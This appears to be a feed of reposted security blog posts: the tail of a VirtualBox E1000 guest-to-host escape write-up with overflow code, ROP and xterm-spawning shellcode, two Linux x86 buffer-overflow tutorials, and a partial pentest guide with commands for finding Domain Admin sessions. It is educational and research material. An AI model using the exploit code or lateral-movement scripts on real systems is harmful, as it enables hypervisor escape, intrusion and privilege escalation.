void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);

    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

    free_buffer(buffer_va);
}

void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");

    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

For now, when the last instruction of e1kHandleRxPacket is executed the saved return address is overwritten and control is transferred anywhere the attacker wants. But DEP is still there. It is bypassed in a classical way of building a ROP chain. ROP gadgets allocate executable memory, copy a shellcode loader into and execute it.

Shellcode

The shellcode loader is trivial. It copies the beginning of the overflowing buffer next to it.

use64

start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop

payload:
    ; Here the shellcode is to be

loader_size = $ - start

The shellcode is executed. Its first part is:

use64

start:
    ; sys_fork
    mov rax, 58
    syscall

    test rax, rax
    jnz continue_process_execution

    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi

    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi

    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall

...

cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

It does fork and execve to create /usr/bin/xterm process. The attacker gains control over the host’s ring 3.

Process Continuation

I believe every exploit should be finished. It means it should not crash an application, though it’s not always possible, of course. We need the virtual machine to continue execution which is achieved by the second part of shellcode.

continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48

    ; Skip junk
    add rsp, 0x10

    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15

    ; Skip junk
    add rsp, 0x8

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL

    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb

    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0

    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

    ret

When e1kHandleRxPacket is called a callstack is:

#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

We’ll jump right to e1kR3NetworkDown_XmitPending which does nothing more and returns to a hypervisor function.

static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

The shellcode adds 0x48 to RBP to make it as it should be in e1kR3NetworkDown_XmitPending. Next, the registers RBX, R12, R13, R14, R15 are taken from stack because it’s required by System V ABI to preserve it in a callee function. If they aren’t the hypervisor will crash because of invalid pointers in them.

It could be enough because the virtual machine isn’t crashes anymore and continues execute. But there will an access violation in PDMR3QueueDestroyDevice function when the VM is shutdown. The reason is that when the heap is overflowed an important structure PDMQUEUE is overwritten. Furthermore, it’s overwritten by the last two ROP gadgets i.e. the last 16 bytes. I tried to reduce the ROP chain size and failed, but when I replaced the data manually the hypervisor was still crashing. It meant the obstacle is not as obvious as seemed.

Data structure being overwritten is a linked list. Data to be overwritten is in the last second list element; a next pointer is to be overwritten. The remedy turned out to be simple:

; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

Getting rid of the last two elements allows the virtual machine to shut down smoothly.

Demo

https://vimeo.com/299325088

Реклама

Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)

( Original text by SubZero0x9 )

Hello Friends, this is the 2nd part of the Linux x86 Buffer Overflows. First of all I want to apologize for such a long delay after the First blog of this series, there were personal and professional issues going on in my life (Well who hasn’t got them? Meh?).

In the previous part we learned about the Process Memory, Stack Region, Stack Operations, Stack Registers, Attempting Buffer Overflow, Overwriting Buffer, ESP and EIP. In case you missed it, here is the link to the Part 1:

https://movaxbx.ru/2018/11/06/getting-started-with-linux-buffer-overflows-x86-part-1-introduction/

Quick Recap to the Part 1:

-> We successfully exploited the insufficient bound checking by giving input which was larger than the buffer size, which led to the overflow.

-> We successfully attempted to overwrite the buffer and the EIP (Instruction Pointer).

-> We used GDB debugger to examine the buffer for our input and where it was placed on the stack.

Till now, we already know how to attempt a buffer overflow on a vulnerable binary. We already have the control of EIP and ESP.

So, Whats Next ?

Till now we have only overwritten the buffer. We haven’t really exploit anything yet. You may have read articles or PoC where Buffer Overflow is used to escalate privileges or it is used to get a reverse shell over the network from a vulnerable HTTP Server. Buffer Overflow is mainly used to execute arbitrary commands on the vulnerable system.

So, we will try to execute arbitrary commands by using this exploit technique.

In this blog, we will mainly focus on how to overwrite the return address to manipulate the flow of control and program execution.

Lets see this in more detail….

We will use a simple program to manipulate its intended output by changing the RETURN address.

(The following example is same as the AlephOne’s famous article on Stack Smashing with some modifications for a better and easy understanding)

Program:

 

This is a very simple program where the variable random is assigned a value ‘0’, then a function named function is called, the flow is transferred to the function()and it returns to the main() after executing its instructions. Then the variable random is assigned a value ‘1’ and then the current value of random is printed on the screen.

Simple program, we already know its output i.e 1.

But, what if we want to skip the instruction random=1; ?

That means, when the function() call returns to the main(), it will not perform the assignment of value ‘1’ to random and directly print the value of random as ‘0’.

So how can we achieve this?

Lets fire up GDB and see how the stack looks like for this program.

(I won’t be explaining each and every instruction, I have already done this in the previous blog. I will only go through the instructions which are important to us. For better understanding of how the stack is setup, refer to the previous blog.)

In GDB, first we disassemble the main function and look where the flow of the program is returned to main() after the function() call is over and also the address where the assignment of value ‘1’ to random takes place.

-> At the address 0x08048430, we can see the value ‘0’ is assigned to random.

-> Then at the address 0x08048437 the function() is called and the flow is redirected to the actual place where the function() resides in memory at 0x804840b address.

-> After the execution of function() is complete, it returns the flow to the main()and the next instruction which gets executed is the assignment of value ‘1’ to random which is at address 0x0804843c.

->If we want to skip past the instruction random=1; then we have to redirect the flow of program from 0x08048437 to 0x08048443. i.e after the completion of function() the EIP should point to 0x08048443 instead of 0x0804843c.

To achieve this, we will make some slight modifications to the function(), so that the return address should point to the instruction which directly prints the randomvariable as ‘0’.

Lets take a look at the execution of the function() and see where the EIP points.

-> As of now there is only a char array of 5 bytes inside the function(). So, nothing important is going on in this function call.

-> We set a breakpoint at function() and step through each instruction to see what the EIP points after the function() is exectued completely.

-> Through the command info regsiters eip we can see the EIP is pointing to the address 0x0804843c which is nothing but the instruction random=1;

Lets make this happen!!!

From the previous blog, we came to know about the stack layout. We can see how the top of the stack is aligned, 8 bytes for the buffer, 4 bytes for the EBP, 4 bytes for the RET address and so on (If there is a value passed as parameter in a function then it gets pushed first onto the stack when the function is called).

-> When the function() is called, first the RET address gets pushed onto the stack so the program flow can be maintained after the execution of function().

->Then the EBP gets pushed onto the stack, so the EBP can act as the offset reference point for other instructions to access and calculate the memory addresses.

-> We have char array buffer of 5 bytes, but the memory is allocated in terms of WORD. Basically 1 word=4 bytes. Even if you declare a variable or array of 2 bytes it will be allocated as 4 bytes or 1 word. So, here 5 bytes=2 words i.e 8 bytes.

-> So, in our case when inside the function(), the stack will probably be setup as buffer + EBP + RET

-> Now we know that after 12 bytes, the flow of the program will return to main()and the instruction random = 1; will be executed. We want to skip past this instruction by manipulating the RET address to somehow point to the address after 0x0804843c.

->We will now try to manipulate the RET address by doing something like below :-

 

Here, we are introducing an int pointer ret, and we are assigning it the starting address of buffer + 12 .i.e (wait lets see this in a diagram)

-> So, the ret pointer now ends exactly at the start where the return value is actually stored. Now, we just want to add ret pointer with some value which will change the return value in such a manner that it will skip past the return = 1;instruction.

Lets just go back to the disassembled main function and calculate how much we have to add to the ret pointer to actually skip past the assignment instruction.

-> So, we already know we want to skip pass the instruction at address 0x0804843c to address 0x08048443. By subtracting these two address we get 7. So we will add 7 to the return address so that it will point to the instruction at address 0x08048443.

-> And now we will add 7 to the ret pointer.

 

So our final code should look like:

 

So, now we will compile our code.

 

Since we are adding code and re-compiling the program, the memory addresses will get changed.

Lets take a look at the new memory addresses.

-> Now the assignment instruction random = 1; is at address 0x08048452 and the next address which we want the return address to point is 0x08048459. The difference between these addresses is still 7. So we are good till now.

Hopefully by executing this we will get the output as “The value of random is: 0”

HOLY HELL!!!

Why did it gave the Segmentation fault (core dumped)? That means maybe the process is trying to access a memory that doesn’t exist or something.

Note:- Well this was really tricky for me atleast. Computers works in mysterious ways, it is not just mathematics, numbers and science ( Yeah I am being dramatic)

Lets fire up our binary in GDB and see whats wrong.

-> As you can see we set a breakpoint at line 4 and run the program. The breakpoint hits and the program halts. Then we examine the stack top and what we see, the distance between the start of the buffer and the start of return address is not 12, its 13. (It doesn’t even make sense mathematically). Three full block adds up for 12 bytes (4 bytes each) and 1 byte for that ‘A’ i.e 41.

-> Our buffer had value “ABCDE” in it. And A in ASCII hex is 41. From 41 to just right before of the return address 0x08048452, the count is 13 which traditionally is not correct. I still don’t know why the difference is 13 instead of 12, if anyone knows kindly tell me in the comments section.

-> So we just change our code from ret = buffer + 12; to ret = buffer + 13;

Now the final code will look like this:

 

Now, we re-compile it and run and hope its now going to give a desired output.

Before continuing lets see this again in GDB:

> So, we can see now after 7 is added to the ret pointer, the return address is now 0x08048459 which means we have successfully skipped past the assignment instruction and overwritten the return address to manipulate our way around the program flow to alter the program execution.

Till now we learnt a very important part of buffer overflow i.e how to manipulate and overwrite the return address to alter the program execution flow.

Now, lets another example where we can overwrite the return address in more similar ‘buffer overflow’ fashion.

We will use the program from protostar buffer overflow series. You can find more about it here: https://exploit-exercises.com/protostar/

 

Small overview of a program:-

->There is a function win() which has some message saying “code flow successfully changed”. So we assume this is the goal.
-> Then there is the main(), int pointer fp is declared and defined to ‘0’ along with char array buffer with size 64. The program asks for user input using the getsfunction and the input is stored in the array buffer.
-> Then there is an if statement where if fp is not equal to zero then it calls the function pointer jumping to some memory location.

Now we already know that gets function is vulnerable to buffer overflow (visit previous blog) and we have to execute the win() function. So by not wasting time lets find out the where the overflow happens.

First we will compile the code:

 

We know that the char array buffer is of 64 bytes. So lets feed input accordingly.

So, as we can see after the 64th byte the overflow occurs and the 65th ‘A’ i.e 41 in ASCII Hex is overwriting the EIP.

Lets confirm this in GDB:

-> As we see the buffer gets overflowed and the EIP is overwritten with ‘A’ i.e 41.

Now lets find the address of the win() function. We can find this with GDB or by objdump.

Objdump is a tool which is used to display information about object files. It comes with almost every Linux distribution.

The -d switch stands for disassemble. When we use this, every function used in a binary is listed, but we just wanted the address of win() function so we just used grep to find our required string in the output.

So it tells us that the win() function’s starting address is 0804846b. To achieve our goal we just have to pass this address after the 64th byte so that the EIP will get overwritten by this address and execute the win() function for us.

But since our machine is little endian (Find more about it here)we have to pass the address in a slightly different manner (basically in reverse). So the address 0804846b will become \x6b\x84\x04\x08 where the \x stands for HEX value.

Now lets just form our input:

As we can see the win() function is successfully executed. The EIP is also pointing the address of win().

Hence, we have successfully overwritten the return address and exploited the buffer overflow vulnerability.

Thats all for this blog. I am sorry but this blog also went quite long, but I will try to keep the next blog much shorter. And also, in the next blog we will try to play with shellcode.

 

 

Getting Started with Linux Buffer Overflows x86 – Part 1 (Introduction)

( Original text by SubZero0x9 )

Hello Friends, this series of blog posts will purely focus on Buffer Overflows. When I started my journey in Infosec, this one topic fascinated me as much as it frightened me. When I read some of the blogs related to Buffer Overflows, it really seemed as some High-level gibber jabber containing C code, Assembly and some black terminals (Yeah I am talking about GDB). Over the period of time and preparing for OSCP, I started to learn about Buffer Overflows in detail referring to the endless materials on Web scattered over different planets. So, I will try to explain Buffer Overflow in depth and detail so everyone reading this blog can understand what actually a Buffer Overflow is.

In this blog, we will understand the basic fundamentals behind the Buffer Overflow vulnerability. Buffer Overflow is a memory corruption attack which involves memory, stack, buffers to name a few. We will go through each of this and understand why really Buffer Overflows takes place in the first place. We will focus on 32-bit architecture.

A little heads up: This blog is going to be a lengthy one because to understand the concepts of Buffer Overflow, we have to understand the process memory, stack, stack operations, assembly language and how to use a debugger. I will try to explain as much as I can. So I strongly suggest to stick till the end and it will surely clear your concepts. Also, from the next blog I will try to keep it short :p :p

So lets get started….
Before getting to stack and buffers, it is really important to understand the Process Memory Organization. Process Memory is the main playground where it all happens. In theory, the Process memory where the program/process resides is quite a complex place. We will see the basic part which we need for Buffer Overflow. It consists of three main regions: Text, Data and Stack.

Text: The Text region contains the Program Code (basically instructions) of the executable or the process which will be executed. The Text area is marked as read-only and writing any data to this area will result into Segmentation Violation (Memory Protection Mechanism).

Data: The Data region consists of the variables which are declared inside the program. This area has both initialized (data defined while coding) and uninitialized (data declared while coding) data. Static variables are stored in this section.

Stack: While executing a program, there are many function and procedure calls along with many JUMP instructions which after the functions work is done has to return to its next intended place. To carry out this operation, to execute a program, the memory has an area called Stack. Whenever the CALL instruction is used to call a function, the stack is used. The Stack is basically a data structure which works on the LIFO (Last In First Out) principle. That means the last object entering the stack is the first object to get out. We will see how a stack works in detail below.

To understand more about the Process Memory read this fantastic article: https://www.bottomupcs.com/elements_of_a_process.xhtml

So Lets see an Assembly Code Skeleton to understand more about how the program is executed in Process Memory.


Here, as we can see the assembly program skeleton has three sections: .data, .bss and .txt

-> .txt section contains the assembly code instructions which resides in the Text section of the process memory.

-> .data section contains the initialized data or lets say defined variables or data types which resides in the Data section of the process memory.

-> .bss section contains the uninitialized data or lets say declared variables that will be used later in the program execution which also resides in the Data section of the process memory

However in a traditionally compiled program there may be many sections other than this.

Now the most important part….

HOLY STACK!!!

As we discussed earlier all the dirty work is done on the Stack. Stack is nothing but a region of memory where data is temporarily stored to carry out some operations. There are mainly two operations performed by stack: PUSH and POPPUSH is used to add the object on top of the stack, POP is used to remove the object from top of the stack.

But why stack is used in the first place?

Most of the programs have functions and procedures in them. So during the program execution flow, when the function is called, the flow of control is passed to the stack. That means when the function is called, all the operations which will take place inside the function will be carried out on the Stack. Now, when we talk about flow of control, after when the execution of the function is done, the stack has to return the flow of control to the next instruction after which the function was called in the program. This is a very important feature of the stack.

So, lets see how the Stack works. But before that, lets get familiar with some stack pointers and registers which actually carries out everything on the Stack.

ESP (Extended Stack Pointer): ESP is a stack register which points to the top of the stack.

EBP (Extended Base Pointer): EBP is a stack register which points to the top of the current frame when a function is called. EBP generally points to the return address. EBP is really essential in the stack operations because when the function is called, function arguments and local variables are stored onto the stack. As the stack grows the offset of both the function arguments and variables changes with respect to ESP. So ESP is changed many times and it is difficult for the compiler to keep track, hence EBP was introduced. When the function is called, the value of ESP is copied into EBP, thus making EBP the offset reference point for other instructions to access and calculate the memory addresses.

EIP (Extended Instruction Pointer): EIP is a stack register which tells the processor about the address of the next instruction to execute.

RET (return) address: Return address is basically the address to which the flow of control has to be passed after the stack operation is finished.

Stack Frame: A stack frame is a region on stack which contains all the function parameters, local variables, return address, value of instruction pointer at the time of a function call.

Okay, so now lets see the stack closely by executing a C program. For this blog post we will be using the program challenge ‘stack0’ from Protostar exploit series, which is a stack based buffer overflow challenge series.
You can find more about Protostar exploit series here -> https://exploit-exercises.com/protostar/

The program:

Whats the program about ?
An int variable modified is declared and a char array buffer of 64 bytes is declared. Then modified is set to 0 and user input is accepted in buffer using gets() function. The value of modified is checked, if its anything other than 0 then the message “you have changed the ‘modified’ variable” will be printed or else “Try again?” will be printed.

Lets execute the program once and see what happens.

So after executing the program, it asks for user input, after giving the string “IamGrooooot” it displays “Try again?”. By seeing the output it is clear that modified variable is still 0.

Now lets try to debug this executable in a debugger, we will be using GDB throughout this blogpost series (Why? Because its freaking awesome).

Just type gdb ./executable_name to execute the program in the debugger.

The first thing we do after firing up gdb is disassembling the main() function of our program.

We can see the main() function now, its in assembly language. So lets try to understand what actually this means.

From the address 0x080483f4 the main() function is getting started.
-> Since there is no arguments passed in the main function, directly the EBP is pushed on the stack.
As we know EBP is the base pointer on the stack, the Stack pushes some starting address onto the EBP and saves it for later purposes.

-> Next, the value of ESP is moved into EBP. The value of ESP is saved into EBP. This is done so that most of the operations carried out by the function arguments and the variable changes the ESP and it is difficult for the compiler to keep track of all the changes in ESP.

-> Many times the compiler add some instructions for better alignment of the stack. The instruction at the address 0x080483f7 is masking the ESP and adding some trailing zeros to the ESP. This instruction is not important to us.

-> The next instruction at address 0x080483fa is subtracting 0x60 hex value from the ESP. Now the ESP is pointing to a far lower address from the EBP(As we know the stack grows down the memory). This gap between the ESP and EBP is basically the Stack frame, where the operations needed to execute the program is done.

-> Now the instruction at address 0x080483fd is from where all our C code will make sense. Here we can see the instruction movl $0x0,0x5c(%esp) where the value 0 is moved into ESP + the offset 0x5c, that means 0 is moved to the address [ESP+0x5c]. This is same as in our program, modified=0.

-> From address 0x08048405 to 0x0804840c are the instructions with accepts the user input.
The instruction lea 0x1c(%esp),%eax is loading the effective address i.e [ESP+0x1c] into EAX register. This address is pointing to the char array buffer on the stack. The lea and mov instructions are almost same, the only difference is the leainstruction copies the address of the register and offset into the destination instead of the content(which the mov instruction does).

-> The instruction mov %eax,(%esp) is copying the address stored in EAX register into ESP. So the top of the stack is pointing to the address 0x1c(%esp). Another important thing is that the function parameters are stored in the ESP. Assuming that the next instruction is calling gets function, the gets function will write the data to a char array. In this case the ESP is pointing to the address of the char buffer and the gets function writes the data to ESP(i.e the char array at the address 0x1c(%esp) ).

-> From the address 0x08048411 to 0x0804842e, the if condition is carried out. The instruction mov 0x5c(%esp),%eax is copying the value of modified variable i.e 0 into EAX. Then the test instruction is checking whether the value of modifiedis changed or not. If the value is not changed i.e the je instruction’s output is equal then the flow of control will jump to 0x08048427 where the message “Try again?” will be printed. If the value is changed then flow of control will be normal and the next instruction will be executed, thus printing the message “you have changed the ‘modified’ variable”.

-> Now all the opertions are done. But the stack is as it is and for the program to be completed the flow control has to be passed to the RET address which is stored on the stack. But till now only variables and addresses has been pushed on the stack but nothing has been popped. At the address 0x08048433 the leave instruction is executed. The leave instruction is used to “free” the stack frame. If we see the disassemble main() the first two instructions push %ebp and push %esp,%ebp, these instructions basically sets up the stack frame. Now the leave instruction does exactly the opposite of what the first two instructions did, mov %ebp,%esp and pop %ebp. So these two instructions free ups stack frame and the EIP points to the RET address which will give the flow of control to the address which was next after the called function. In this case the RET value is not pointing to anything because our program ends here.

So till now we have seen what our C code in Assembly means, it is really important to understand these things because when we debug or lets say Reverse Engineer some binary and stuff, this understanding of how closely the memory and stack works really comes in handy.

Now we will see the stack operations in GDB. For those who will be doing debugging and reversing for the first time it may feel overwhelming seeing all these instructions(believe me, I used to go nuts sometimes), so for the moment we will focus only on the part which is required for this series to understand, like where is our input being written, how the memory addresses can be overwritten and all those stuffs….

Here comes the mighty GDB !!!!

In GDB we will list the program, so we can know where we want to set a breakpoint.

We will set the breakpoint for line number 7,11,13Lets run it in GDB..-> After we run it in GDB, we can see the breakpoints which we set is now hit, basically it is interrupting the program execution and halting the program flow at the given breakpoint.

-> We step to next instruction by typing s in the prompt, we can again see the next breakpoint gets hit.

-> At this point we check both our stack registers ESP and EIP. We look these two registers in two different ways. We check the ESP using the x switch which is for examine memory. We can see the ESP is pointing to the stack address 0xbffff0b0and the value it contains is 0x00000000 i.e 0. We can easily assume that, this 0 is the same 0 which gets assigned to the modified variable.

-> We check the EIP by the command info registers eip (you can see info about all the registers by simply typing info registers). We see the EIP is pointing to the memory address 0x8048405 which is nothing but the address of next instruction to be executed.

Now we step next and see what happens.-> When we step through the next instruction it asks us for the input. Now we give the input as random sets of ‘A’ and then we can see our third breakpoint which we set earlier is hit.

-> We again check the ESP and EIP. We clearly see the ESP is changed and pointing to different stack address. EIP now is pointing to the next instruction which is going to be executed.

Now lets see, the input which we gave where does it goes?-> By using the examine memory switch i.e x we see the contents of ESP. We are viewing the 24 words of content on the stack in Hex (thats why x/24xw $esp). We can see our input ‘A’ that is 41 in hex (according to the ASCII standards) on the stack(highlighted portion). So we can see that our input is being written on the stack.

Again lets step through the next instruction.-> In the previous step we saw that the instruction if(modified !=0) is going to be executed. Now lets go back to the section where we saw the assembly instructions equivalent of the C program in detail. We can see the instruction test %eax,%eaxwill be executed. So we already know it will compare if the modified value has changed or not.

How do we see that ?

-> We simply check the EAX register by typing info registers eax. We can see that the value of EAX is 0x0 i.e 0, that means the value of modified variable is still 0. Now we know that the message “Try again?” is going to be printed. The EIP also confirms this, the output of EIP points to 0x8048427 which if you look at the disassembled main function, you can see that it is calling the second puts function which has the message “Try again?”.

Lets step and move towards the exit of the program.-> When we step through the next instruction, it gives us the message “Try again?”. Then we check the EIP it points to 0x8048433, which is nothing but the leaveinstruction. Again we step through, we can the program exiting and terminated with the exit system call that is in the libc.s0.6 shared library files.

WOAH!!!!!

Till now, we saw the how the process memory works, how the programs gets loaded into the memory and how the stack operations are done when the program gets executed. Now this was more than enough to understand what Buffer Overflow really is.

BUFFER OVERFLOW

Finally we can get started with the topic. Lets ask ourselves two very simple questions:

What is a Buffer?
-> Buffer is a temporary storage place in memory to store data.

What is Buffer Overflow?
-> When a data written to a buffer that is larger than the actual buffer size and due to improper bounds checking it gets overflowed and overwrites the adjacent memory addresses/locations.

So, its time to get our hands dirty by smashing the stack. But before that, for this blogpost series we will only focus on the Stack based overflows. Also the examples which we are going to see may not be vulnerable to buffer overflow because the newer system kernels handle all these things in a very effifcient way. If you are using a newer system, for e.g Ubuntu 16.04 LTS you have to go and disable the ASLR bit to off as it is set to protect from the Memory Corruption attacks.
To disable it simply type : echo 0 > /proc/sys/kernel/randomize_va_space in your terminal.

Also you have to compile the program using gcc with stack smashing detect feature disabled. To do this compile your program using:

We will use the earlier program which we used for understanding the stack. This program is vulnerable to buffer overflow. As we can see the the program is using gets function to accept the user input. Now, this gets function has some serious security issues. Lets see the man page for gets.As, we can see the highlighted part it says “Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead”.

From here we can understand there is actually no bound checks happening when the user input is taken through the gets function (Extremely Dangerous Right?).

Now lets look what the program is and what the challenge of the program is all about.
-> We already discussed that if the modified variable is not 0, then the message “you have changed the ‘modified’ variable” will be printed. But if we look at the program, there is no way the modified variable’s value can be changed. So how it can be done?

-> The line where it takes user input and writes into char array buffer is actually our way to go and change the value of modified. The gets(buffer); is the vulnerable code.

In the code we can see the modified variable assignment and the input of char array buffer is next to each other,

This means when this two instructions will be executed by the processor the modified variable and buffer array will be adjacent to each other in the stack frame.

So, what does this means?
-> When we feed input to the buffer more than it is capable of, the extra input which we feed will get overwritten to the adjacent memory location, in this case the memory location pointing to the modified variable. Thus, the modified variable will be no longer be 0 and the success message will be printed.

Due to buffer overflow the above scenario was possible. Lets see in more detail.

First we will try to execute the program with some random input and see where the overflow happens.-> We already know the char array buffer is of 64 bytes. So we try to enter 60, 62, 64 times ‘A’ to our program. As, we can see the modified variable is not changed and the failure message is printed.

->But when we enter 65 A’s to our program, the value of modified variable mysteriously changes and the success message is printed.

->The buffer overflow has happened after the 64th byte of input and it overwrites the memory location after that i.e where the modified variable is stored.

Lets load our program in GDB and see how the modified variable’s memory location got overwritten.-> As we can see, the breakpoints 1 and 2 got hit, then we check the value of modified by typing x/xw $esp+0x5c (stack register + offset). If we see in the disassembled main function we can see the value 0 gets assigned to modifiedvariable through this instruction: movl $0x0,0x5c(%esp), that’s why we checked the value of modified variable by giving the offset along with the stack register ESP. The value of modified variable at stack location 0xbffff10c is 0x00000000.

->After stepping through, its asking us to enter the input. Now we know 65th byte is the point where the buffer gets overflowed. So we enter 65 A’s and then check the stack frame.

-> As we can see our input A i.e 41 is all over the stack. But we are only concerned with the adjacent memory location where the modified variable is there. By quickly checking the modified variable we can see the value of the stack address pointing to the modified variable 0xbffff10c is changed from 0x00000000 to 0x00000041.

-> This means when the buffer overflow took place it overwritten the adjacent memory location 0xbffff10c to 0x00000041.

-> As we step through the next instruction we can see the success message “you have changed the ‘modified’ variable” printed on the screen.

This was all possible because there was insufficient bounds checking when the user input was being written in the char array buffer. This led to overflow and the adjacent memory location (modified variable) got overwritten.

Voila !!!

We successfully learned the fundamentals of process memory, Stack operations and Buffer Overflow in detail. Now, this was only the concept of how buffer overflow takes place. We still haven’t exploited this vulnerability to actually exploit the system. In the next blog we will see how to execute arbitrary commands through Shellcode using this Buffer Overflow vulnerablity.

Till then, go and learn as much as possible about Assembly and GDB, because we are going to use this extensively in the future blogposts.

5 Ways to Find Systems Running Domain Admin Processes

( Original text by Scott Sutherland )

Introduction

Migrating to Domain Admin processes is a common way penetration testers are able to impersonate Domain Admin accounts on the network. However, before a pentester can do that, they need to know what systems those processes are running on. In this blog I’ll cover 5 techniques to help you do that. The techniques that will be covered include:

  1. Checking Locally
  2. Querying Domain Controllers for Active Domain User Sessions
  3. Scanning Remote Systems for Running Tasks
  4. Scanning Remote Systems for NetBIOS Information
  5. PSExec Shell Spraying Remote Systems for Auth Tokens

Obtaining Domain Admin Privileges

For the most part, this blog will focus on identifying systems that are running Domain Admin processes. However, for the sake of context, I’ve outlined the standard process many penetration testers use to obtain Domain Admin privileges.

  1. Identify target systems and applications
  2. Identify potential vulnerabilities
  3. Exploit vulnerabilities to obtain initial access
  4. Escalate privileges on the compromised system
  5. Locate Domain Admin processes/authentication tokens locally or on Remote Systems
  6. Authenticate to a remote system running Domain Admin Processes by passing the local Administrator’s password hash, cracking passwords, or dumping passwords with a tool like mimikatz
  7. Migrate to a Domain Admin Process
  8. Create a Domain Admin

The process as a whole is well known in the penetration testing community, and you should be able to find plenty of blogs, white papers, and video tutorials via Google if you’re interested in more details. Moving forward, I will only be focusing on options for number 5.

Finding Domain Admin Processes

Ok, enough of my ramblings. As promised, below are 5 techniques for finding Domain Admin processes on the network.

Technique 1: Checking Locally

Always check the initially compromised system first. There’s really no point is running around the network looking for Domain Admin processes if you already have one. Below is a simple way to check if any Domain Admin processes are running using native commands:

  1. Run the following command to get a list of domain admins:net group “Domain Admins” /domain
  2. Run the following command to list processes and process owners. The account running the process should be in the 7th column.Tasklist /v
  3. Cross reference the task list with the Domain Admin list to see if you have a winner.

It would be nice if Domain Admin processes were always available on the system initially compromised, but sometimes that is not the case. So the next four techniques will help you find Domain Admin process on remote domain systems.

Technique 2: Querying Domain Controllers for Active Domain User Sessions

To my knowledge this technique is a NetSPI original. We wanted a way to identify active Domain Admin processes and logins without having to spray shells all over the network or do any scanning that would set off IDS. Eventually it occurred to us to simply query the domain controllers for a list of active domain user sessions and cross reference it with the Domain Admin list. The only catch is you have to query all of the domain controllers. Below I’ve provided the basic steps to get list of systems with active Domain Admin sessions as a domain user:

  1. Gather a list of Domain Controllers from the “Domain Controllers” OU using LDAP queries or net commands. I’ve provided a net command example below.net group “Domain Controllers” /domainImportant Note: The OU is the best source of truth for a list of domain controllers, but keep in mind that you should really go through the process of enumerating trusted domains and targeting those domain controllers as well.

    Alternatively, you can look them up via DNS.

    Nslookup –type=SRV _ldap._tcp.

  2. Gather a list of Domain Admins from the “Domain Admins” group using LDAP queries or net commands. I’ve provided a net command example below.net group “Domain Admins” /domain
  3. Gather a list of all of the active domain sessions by querying each of the domain controllers using Netsess.exe. Netsess is a great tool from Joe Richards that wraps around the native Windows function “netsessionenum”. It will return the IP Address of the active session, the domain account, the session start time, and the idle time. Below is a command example.Netsess.exe –h
  4. Cross reference the Domain Admin list with the active session list to determine which IP addresses have active domain tokens on them. In more secure environments you may have to wait for a Domain Admin or Service account with Domain Admin privileges to take actions on the network. What that really means I you’ll have to run through the process multiple time, or script it out. Below is a very quick and dirty Windows command line script that uses netsess. Keep in mind that dcs.txt has a list of domain controllers and admins.txt has a list of Domain Admins.FOR /F %i in (dcs.txt) do @echo [+] Querying DC %i && @netsess -h %i 2>nul > sessions.txt && 
    FOR /F %a in (admins.txt) DO @type sessions.txt | @findstr /I %a

I wrote a basic batch script named Get Domain Admins (GDA) which can be download  that automates the whole process. The dependencies are listed in the readme file. I would like to give a shout out to Mark Beard and Ivan Dasilva for helping me out on it. I’ve also created a batch file called Get Domain Users (GDU) for Windows Dictionary attacks which has similar options, but more dependencies. If you interested it can be downloaded by clicking the link above.

Technique 3: Scanning Remote Systems for Running Tasks

I typically have success with the first two options. However, I came across this method in a pauldotcom blog by LaNMSteR53 and I thought it was a clever alternative. Once you are running as the shared local administrator account on a domain system you can run the script below to scan systems for Domain Admin Tasks. Similar to the last technique you will need to enumerate the Domain Admins first. In the script below ips.txt contains a list of the target systems and the names.txt contains a list of the Domain Admins.

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt &&
FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

The original post is: Crawling for Domain Admin with Tasklist if you’re interested.

Technique 4: Scanning Remote Systems for NetBIOS Information

